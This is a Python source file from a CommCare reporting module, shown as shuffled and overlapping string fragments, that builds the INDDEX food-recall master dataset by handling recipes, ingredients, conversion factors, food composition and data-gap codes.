"_maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction']",
"foods are recipes, and their ingredients appear as separate rows in the report.",
"ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to",
"[FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw,",
"ingredients come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data)",
"I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR,",
"indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been",
"food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return",
"def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: #",
"rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe,",
"for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def",
"= None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res",
"self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe,",
"of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an indicator that hasn't",
"'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food",
"together all the component pieces and presents the result as a unified dataset.",
"UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else:",
"memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF",
"IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR),",
"(self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif",
"I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE),",
"= _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in [amount, portions, amount_post_cooking]):",
"IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META),",
"isn't available. Some of these foods are recipes, and their ingredients appear as",
"gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type') if",
"I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE),",
"ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and",
"= self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code:",
"glues together all the component pieces and presents the result as a unified",
"ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code =",
"if all(val is not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] =",
"CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY",
"I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed',",
"= self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and",
"'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed =",
"be \" \"calculated outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: #",
"nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions =",
"results in the creation of a \"food\" case that's a child of this",
"def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if slug not",
"master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe",
"for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name",
"def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type",
"row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res",
"recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type",
"gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False",
"= 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I:",
"Nonstandard recipes are defined by the user and beneficiary during a recall session.",
"in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id':",
"self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code':",
"of the previously reported ingredients into the report for them. Components ---------- FoodData",
"self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction)",
"getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references",
"return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no",
"reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS =",
"don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request,",
"res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else",
"and indicator definitions. \"\"\" import operator import uuid from collections import defaultdict from",
"if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise",
"}) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row)",
"res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError:",
"IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META),",
"{i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking',",
"of this foodrecall. This dataset has a row for every food, with metadata",
"contains the logic to generate the master dataset for the INDDEX reports Overview",
"references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self):",
"what data is or isn't available. Some of these foods are recipes, and",
"FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the",
"dataset has a row for every food, with metadata about the recall session,",
"row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient'",
"row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError:",
"= _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient:",
"session. The ingredients of the recipe are entered as additional food cases and",
"IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name',",
"return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\"",
"the report for them. Components ---------- FoodData :: This is the interface to",
"group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else:",
"self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE,",
"food fixture or from the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code],",
"+ ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient",
"only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type ==",
"= CALCULATED_LATER in tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit",
"FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in",
"in the creation of a \"food\" case that's a child of this foodrecall.",
"in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def",
"valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug",
"from collections import defaultdict from functools import reduce from memoized import memoized from",
"IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR),",
"I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status',",
"self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams",
"domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v]",
"I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated',",
"I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking',",
"== FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE,",
"row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in",
"their diet in a \"recall\" session. This results in a \"foodrecall\" case. Every",
"'recipe': None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type']",
"rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete =",
"IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR),",
"self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def",
"val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else:",
"additional rows inserted for each ingredient. These rows are associated with the recipe",
"slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures",
"STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE =",
"EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return",
"= FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient",
"except TypeError: return None def _maybe_float(val): return float(val) if val not in (None,",
"which case subsequent references point to the recipe definition with already_reported_recipe_case_id and don't",
"DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]]",
"FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been",
"IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain,",
"if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe",
"raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references':",
"nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE:",
"point to the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again.",
"= 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug,",
"_maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in [amount,",
"IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'),",
"self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients = [FoodRow(raw, self.fixtures)",
"'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition =",
"* portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe,",
"None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res =",
"!= 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or",
"res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None def _maybe_float(val):",
"= ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if not self.age_months_calculated: return None for age_range in",
"and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in",
"self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections",
"{col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking",
"in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate':",
"cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if",
"args) except TypeError: return None def _maybe_float(val): return float(val) if val not in",
"cases and linked to the recipe by `recipe_case_id`. Beneficiaries may report eating a",
"and presents the result as a unified dataset. FoodRow :: Class responsible for",
"IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR,",
"FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in",
"by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], })",
"I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status',",
"ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code",
"return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return",
"I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META),",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10',",
"a case of their own. Nonstandard recipes are defined by the user and",
"I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe',",
"row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy",
"self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get(",
"a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for",
"`recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than once, in which",
"# If it's an indicator in the UCR that hasn't been explicitly set,",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4',",
"and their ingredients appear as separate rows in the report. Standard recipes have",
"We need to insert duplicates of the previously reported ingredients into the report",
"tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator",
"in NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row, col, getattr(recipe,",
"if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by owner",
"FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM",
"check if it can # be pulled from the food fixture or from",
"self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate),",
"EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row):",
"---------- FoodData :: This is the interface to this dataset, it glues together",
"FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr'",
"'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self):",
"IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural',",
"age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def",
"filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain,",
"if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData:",
"= total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name",
"'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug = slug",
"'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid =",
"self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not",
"= {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions'])",
"the INDDEX reports Overview -------- Beneficiaries are asked about their diet in a",
"recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type",
"== ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and",
"found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor,",
"IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR,",
"row): # If a gap type is specified, show only rows with gaps",
"self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): #",
"= ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding",
"self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = [] for row in self._get_all_rows():",
"= self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code",
"once, in which case subsequent references point to the recipe definition with already_reported_recipe_case_id",
"as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from",
"I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code',",
"row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't",
"self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE",
"'calculated_later' class I: def __init__(self, slug, *tags): self.slug = slug tags = set(tags)",
"self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term",
"(self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code =",
"I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type',",
"= _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe,",
"that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE:",
"= FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from",
"outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an",
"(self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used =",
"_maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for",
"indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be",
"FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row",
"datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain, request), **{k: [v for v in request.GET.getlist(k) if v] for",
"tags # Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [",
"for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] =",
"a child of this foodrecall. This dataset has a row for every food,",
"'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS}",
"reporting on what data is or isn't available. Some of these foods are",
"'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if",
"self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get",
"asked about their diet in a \"recall\" session. This results in a \"foodrecall\"",
"True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda:",
"it can # be pulled from the food fixture or from the parent",
"(STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else:",
